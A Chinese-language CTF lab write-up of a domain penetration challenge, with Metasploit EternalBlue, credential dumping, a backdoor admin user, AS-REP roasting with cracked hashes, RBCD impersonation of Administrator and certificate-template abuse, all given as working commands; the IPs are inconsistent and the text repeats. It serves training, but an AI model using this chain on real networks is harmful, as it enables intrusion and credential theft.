网鼎杯半决渗透赛复现分析
字数 1573 2025-08-22 12:22:30

网鼎杯半决赛渗透赛复现分析教学文档

1. 环境拓扑与目标信息

1.1 网络拓扑结构

设备名称 IP地址 内网IP
WEB01 39.99.136.199 172.22.15.26
XR-WIN08 - 172.22.15.24
XR-0687 - 172.22.15.35
XR-DC01 - 172.22.15.13
XR-CA - 172.22.15.48

1.2 外网打点

1.2.1 端口扫描

使用fscan扫描外网IP 39.99.224.45:

39.99.224.45:22 open
39.99.224.45:80 open

1.2.2 Web应用识别

访问http://39.99.224.45返回:

  • HTTP状态码: 200
  • 响应长度: 39962
  • 标题: XIAORANG.LAB

1.2.3 目录扫描

使用dirsearch扫描发现后台登录页面,存在弱密码:

admin/123456

1.2.4 Webshell上传

在主题模板界面编辑上传webshell,成功获取权限:

http://39.99.131.228/wp-content/themes/twentytwentyone/404.php

2. 内网渗透

2.1 内网信息收集

2.1.1 跳板机信息

查看跳板机内网IP: 172.22.15.26

2.1.2 内网扫描

使用fscan扫描C段(ICMP):

Target 172.22.15.26 is alive
Target 172.22.15.24 is alive
Target 172.22.15.13 is alive
Target 172.22.15.35 is alive
Target 172.22.15.18 is alive

2.1.3 端口扫描结果

172.22.15.24 : 3306 open
172.22.15.18 : 445 open
172.22.15.35 : 445 open
172.22.15.13 : 445 open
172.22.15.24 : 445 open
172.22.15.18 : 139 open
172.22.15.35 : 139 open
172.22.15.13 : 139 open
172.22.15.24 : 139 open
172.22.15.13 : 135 open
172.22.15.18 : 135 open
172.22.15.35 : 135 open
172.22.15.24 : 135 open
172.22.15.18 : 80 open
172.22.15.24 : 80 open
172.22.15.26 : 80 open
172.22.15.26 : 22 open
172.22.15.13 : 88 open

2.1.4 系统识别

172.22.15.18 [ -> ] XR-CA [ -> ] 172.22.15.18
172.22.15.24 [ -> ] XR-WIN08 [ -> ] 172.22.15.24
172.22.15.13 [ -> ] XR-DC01 [ -> ] 172.22.15.13
172.22.15.35 [ -> ] XR-0687 [ -> ] 172.22.15.35

172.22.15.35 XIAORANG\XR-0687
172.22.15.13 [ + ] DC : XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393

2.1.5 Web应用识别

http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
http://172.22.15.18 code:200 len:703 title:IIS Windows Server
http://172.22.15.24 code:302 len:0 title:None 跳转 url:http://172.22.15.24/www
[ + ] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
http://172.22.15.24/www/sys/index.php code:200 len:135 title:None

2.2 内网攻击路径

2.2.1 172.22.15.24 (XR-WIN08)

  • 系统: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
  • 漏洞: MS17-010 (永恒之蓝)
  • Web应用: http://172.22.15.24/www/sys/index.php
    • 弱密码: admin/123456
攻击步骤:
  1. 使用MSF攻击永恒之蓝漏洞:
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.15.24
run
  1. 获取哈希:
load kiwi
creds_all
hashdump

结果:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
zdoo
  1. 数据库信息:
phpstudy数据库密码:
root/root@#123
zdoo/zdoo123
  1. 添加后门用户:
load powershell
powershell_execute "net user qwq Qq123456. /add"
powershell_execute "net localgroup administrators qwq /add"

2.2.2 AS-REP Roasting攻击

  1. 查找未设置Kerberos预身份认证的用户:
proxychains python3 GetNPUsers.py -dc-ip 172.22.15.13 -usersfile user.txt xiaorang.lab/

返回票据:

$krb5asrep$23$lixiuying@XIAORANG.LAB:ed86f768287f6a44cbb2885c01f0ad42$a1ac3ad734454fee6acb5d25bf9f62af558b200f9d29dbe1dbc8a52d02d83795961c48d696a352957d28b59508da600a3e7e1b6f46fc7b1de1b87e5bc2f4b9c16879dffd43b3c23f95654fd180173b10ec149eab923e442160c09aae74bb4680d973d71e7b702b64b271b0c1c6e07d032b46b616a2c9c21e9aa4f5ef2e05e346a1e85e68bbe6916dcb7e8f74d01554b08e9fa903f9011164aac11e28edba78381da7803cc6f036b2225f443d494cb7fc8f1918ccaa623d22276f999a9241ec847a4e888bf9d30f7d33fe256d5a65c75a3c885e79e58073455a70d8aecf27622b253bcf2532b874f299947140
$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0
  1. 使用hashcat爆破:
hashcat -m 18200 --force -a 0 '$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0' rockyou.txt

爆破结果:

lixiuying@XIAORANG.LAB winniethepooh
huachunmei@XIAORANG.LAB 1qaz2wsx

2.2.3 RBCD(基于资源的约束委派)提权

  1. 使用BloodHound分析域环境:
proxychains4 -q python3 bloodhound.py -u lixiuying -p winniethepooh -d xiaorang.lab -dc XR-DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.15.13 --auth-method ntlm --zip

发现具有GenericWrite权限,可进行RBCD攻击

  1. 添加机器账户:
proxychains4 -q impacket-addcomputer -computer-name 'EVILCOMPUTER$' -computer-pass '123@#ABC' -dc-host XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 "xiaorang.lab/lixiuying:winniethepooh"
  1. 配置RBCD:
proxychains4 -q impacket-rbcd xiaorang.lab/lixiuying:winniethepooh -action write -delegate-from "EVILCOMPUTER$" -delegate-to "XR-0687$" -dc-ip 172.22.15.13
  1. 请求并冒充域管权限的服务票据:
proxychains4 -q impacket-getST xiaorang.lab/EVILCOMPUTER$:'123@#ABC' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
  1. 导入票据:
export KRB5CCNAME=administrator.ccache
  1. 使用PTT登录主机:
proxychains python3 psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13


proxychains4 -q impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k

2.2.4 172.22.15.18 (XR-CA) - CVE-2022-26923

  1. 查找证书服务器和可利用的证书模板:
proxychains4 -q certipy find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout
  1. 申请证书模板:
proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'

3. 关键知识点总结

  1. 外网打点技巧:

    • 使用fscan进行快速端口扫描
    • dirsearch扫描发现后台和弱密码
    • 通过主题模板编辑上传webshell

  2. 内网渗透技术:

    • 永恒之蓝(MS17-010)漏洞利用
    • AS-REP Roasting攻击未设置Kerberos预认证的用户
    • RBCD(基于资源的约束委派)提权技术
    • CVE-2022-26923证书服务漏洞利用

  3. 工具使用:

    • fscan: 内网扫描和漏洞识别
    • Metasploit: 永恒之蓝漏洞利用
    • Impacket工具集: AS-REP Roasting、RBCD攻击
    • Certipy: 证书服务漏洞利用
    • BloodHound: 域环境分析

  4. 权限维持:

    • 添加隐藏用户
    • 获取域管票据进行PTT(Pass The Ticket)攻击

  5. 域渗透技巧:

    • 通过GenericWrite权限进行RBCD攻击
    • 利用证书模板漏洞获取域控权限
网鼎杯半决赛渗透赛复现分析教学文档 1. 环境拓扑与目标信息 1.1 网络拓扑结构 | 设备名称 | IP地址 | 内网IP | |------------|--------------|--------------| | WEB01 | 39.99.136.199 | 172.22.15.26 | | XR-WIN08 | - | 172.22.15.24 | | XR-0687 | - | 172.22.15.35 | | XR-DC01 | - | 172.22.15.13 | | XR-CA | - | 172.22.15.48 | 1.2 外网打点 1.2.1 端口扫描 使用fscan扫描外网IP 39.99.224.45: 1.2.2 Web应用识别 访问http://39.99.224.45返回: HTTP状态码: 200 响应长度: 39962 标题: XIAORANG.LAB 1.2.3 目录扫描 使用dirsearch扫描发现后台登录页面,存在弱密码: 1.2.4 Webshell上传 在主题模板界面编辑上传webshell,成功获取权限: 2. 内网渗透 2.1 内网信息收集 2.1.1 跳板机信息 查看跳板机内网IP: 172.22.15.26 2.1.2 内网扫描 使用fscan扫描C段(ICMP): 2.1.3 端口扫描结果 2.1.4 系统识别 2.1.5 Web应用识别 2.2 内网攻击路径 2.2.1 172.22.15.24 (XR-WIN08) 系统: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 漏洞: MS17-010 (永恒之蓝) Web应用: http://172.22.15.24/www/sys/index.php 弱密码: admin/123456 攻击步骤: 使用MSF攻击永恒之蓝漏洞: 获取哈希: 结果: 数据库信息: 添加后门用户: 2.2.2 AS-REP Roasting攻击 查找未设置Kerberos预身份认证的用户: 返回票据: 使用hashcat爆破: 爆破结果: 2.2.3 RBCD(基于资源的约束委派)提权 使用BloodHound分析域环境: 发现具有GenericWrite权限,可进行RBCD攻击 添加机器账户: 配置RBCD: 请求并冒充域管权限的服务票据: 导入票据: 使用PTT登录主机: 或 2.2.4 172.22.15.18 (XR-CA) - CVE-2022-26923 查找证书服务器和可利用的证书模板: 申请证书模板: 3. 关键知识点总结 外网打点技巧 : 使用fscan进行快速端口扫描 dirsearch扫描发现后台和弱密码 通过主题模板编辑上传webshell 内网渗透技术 : 永恒之蓝(MS17-010)漏洞利用 AS-REP Roasting攻击未设置Kerberos预认证的用户 RBCD(基于资源的约束委派)提权技术 CVE-2022-26923证书服务漏洞利用 工具使用 : fscan: 内网扫描和漏洞识别 Metasploit: 永恒之蓝漏洞利用 Impacket工具集: AS-REP Roasting、RBCD攻击 Certipy: 证书服务漏洞利用 BloodHound: 域环境分析 权限维持 : 添加隐藏用户 获取域管票据进行PTT(Pass The Ticket)攻击 域渗透技巧 : 通过GenericWrite权限进行RBCD攻击 利用证书模板漏洞获取域控权限